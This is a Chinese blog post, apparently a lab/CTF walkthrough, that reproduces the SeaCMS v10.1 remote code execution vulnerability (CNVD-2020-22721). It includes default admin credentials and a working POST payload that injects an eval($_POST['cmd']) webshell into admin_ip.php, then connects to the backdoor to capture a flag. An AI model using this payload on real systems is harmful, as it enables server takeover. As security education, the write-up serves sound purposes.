seacms 远程命令执行 (CNVD-2020-22721)

最新推荐文章于 2024-07-27 13:39:59 发布
最新推荐文章于 2024-07-27 13:39:59 发布
阅读量563 收藏 3
点赞数
CC 4.0 BY-SA版权
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_63124284/article/details/127478858
本文介绍了海洋CMS v10.1存在的一个命令执行漏洞,详细解析了漏洞成因,即在w1aqhp/admin_ip.php文件中用户输入未被正确过滤,导致可执行恶意代码。影响范围仅限于v10.1版本。通过漏洞复现步骤,展示了攻击者如何利用此漏洞执行后门并获取服务器权限。为防止类似攻击,建议及时更新到安全版本并加强输入验证。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、产品简介

海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。

2、漏洞概述

SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。

3、影响范围

v10.1

4、漏洞知识

1、审计

寻找用户可控参数,且存在对用户输入没有或处理不完全情况,直接写入文件,攻击者可利用该漏洞执行恶意代码,获取服务器权限。

2、环境

将php后门代码写入到是php的文件里面,然后再连接该php文件。

5、漏洞复现

1、开启靶场访问IP 后台路径:/manager 后台密码:admin:admin

2、点击系统---->后台ip安全设置 点击确认,并抓包

3、 POST提交的数据中写入后门连接代码 v=0&ip=+11111111111";eval($_POST['cmd']);//

4、访问写入的页面 http://123.58.224.8:44871/manager/admin_ip.php 回显正常

5、后门连接

6、获取flag

恸.283
关注
Seacms漏洞分析利用复现 By Assassin
Assassin
08-03 1万+
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms的漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示=== ------------------------------------- 【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 2027
seaCms-命令执行】后门代码写入可解析文件中
seacms 远程命令执行CNVD-2020-22721)漏洞复现
weixin_42675091的博客
09-06 1884
seacms 远程命令执行CNVD-2020-22721)漏洞复现
SeaCMS远程命令执行(CNVD-2020-22721)
m0_65150886的博客
02-21 803
SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,可以直接写入文件。后台路径:/manager 后台密码:admin:admin。2.访问http://ip:port/manager ,进入后台登录页面。海洋CMS是一个自适应电脑、手机、平板、APP多个终端入口的程序。1.访问http://ip:port,出现如下页面,开始实验。5.点击确认,并通过burp进行抓包,修改post请求。3.输入账号密码,进行登录。
seacms_CNVD-2020-22721_v10.1漏洞分析与复现
一个努力学习网安的小牛马
10-27 2271
seacms漏洞复现详情
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
CNVD-2020-10487-Tomcat-Ajp-lfi_exp_
09-29
CNVD-2020-10487-Tomcat-Ajp-lfi
CNVD-2020-10487.7z
09-19
3. CNVD-2020-10487是2020年记录的一个Tomcat漏洞,可能涉及远程代码执行或本地文件包含问题。 4. Ghostcat(CVE-2020-1938)是该漏洞的具体实例,影响Tomcat的AJP连接器,允许攻击者读取服务器文件或执行恶意代码。...
WEB 漏洞:seacms 远程命令执行CNVD-2020-22721
2301_79118231的博客
10-27 792
注:个人笔记,并不全面,仅供参考。
【漏洞复现】五、seacms 远程命令执行CNVD-2020-22721
weixin_52351575的博客
09-21 693
在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。
SeaCMS海洋影视管理系统远程代码执行漏洞复现
holyxp的博客
07-27 3165
所以就去到http://192.168.1.57/SeaCMS_12.9/Upload/install/index.php这个文件来进行安装操作,打开此url会出现下面的界面,然后点击右下角的开始。因为我们是直接在这里安装的,保存了我们的cookie所以我们就直接进来了,如果没有直接进来也不要紧,直接弱密码账户admin 密码admin就行了。很明显我们输入的双引号把变量前面的内容给闭合了,然后后面有双斜杠直接注释了后方的内容,所以就导致了我们利用蚁剑来正向shell。然后下面的随便填,就像这样子。
seacms 远程命令漏洞执行 (CNVD-2020-22721
xy_wjyjw的博客
10-27 400
点击系统——后台IP安全设置(输入允许 IP:127.0.0.1)打开虚拟终端,输入命令dir /tmp,查看flag。利用漏洞的IP,用蚁剑连接漏洞,连接成功。点击Forward放包,发送到网站。进入bp的网站,并输入url地址。抓包成功,注入一句话密码。填入flag,成功通关。在bp中点击开始抓包。
WEB漏洞之:海洋CMS代码执行(CNVD-2020-22721
一位热爱网安的年轻人的博客
11-18 1928
web安全漏洞复现之:海洋cms远程代码执行
seacms admin_ip.php RCE (CVE-2022-48093) 漏洞复现
weixin_68999845的博客
07-31 736
改内容写入的是 .php 文件内的,观察请求的payload是否是恶意的php语句,分析其作用,在本地测试即可(若写入一句话木马,用antswords连接.php文件观察是否成功即可)1.下载源码到本地:https://github.com/seacms-com/seacms。1.登录后台(在配置环境时,后台地址时随机生成的,本次地址为:seacms-master/源码下载url:https://github.com/seacms-com/seacms。以下版本受该漏洞影响:seacms全版本。
[漏洞复现]seacms(v6.53)代码执行漏洞
Vicl1fe的博客
12-30 4395
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://blog.youkuaiyun.com/weixin_44897902/article/details/100853036 https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg 环境: 链接:https://pan.ba...
Fastjson反序列化远程代码执行漏洞(CNVD-2020-30827)漏洞复现
最新发布
12-28
### 复现 FastJSON 反序列化远程代码执行漏洞 CNVD-2020-30827 #### 准备工作 为了复现此漏洞,需准备以下条件: - 使用受影响版本的 FastJSON 库(),因为这些版本存在反序列化过程中处理 `@type` 字段的安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值